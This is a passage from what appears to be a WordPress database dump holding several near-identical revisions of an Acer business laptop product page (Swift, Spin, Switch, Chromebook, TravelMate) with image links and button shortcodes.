]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:30:36','2019-09-17 09:30:36','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3104,1,'2019-09-17 17:30:09','2019-09-17 09:30:09','<h3>Business Product Solution</h3>\r\n<br>\r\n<br>\r\n<br>\r\n<br>\r\n<br>\r\n<br>\r\n<br>\r\n<br>\r\n<br>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:30:09','2019-09-17 09:30:09','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3106,1,'2019-09-17 17:31:00','2019-09-17 09:31:00','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:31:00','2019-09-17 09:31:00','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3107,1,'2019-09-17 17:32:39','2019-09-17 09:32:39','<h3>Business Product Solution</h3>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:32:39','2019-09-17 09:32:39','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3108,1,'2019-09-17 17:33:14','2019-09-17 09:33:14','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security 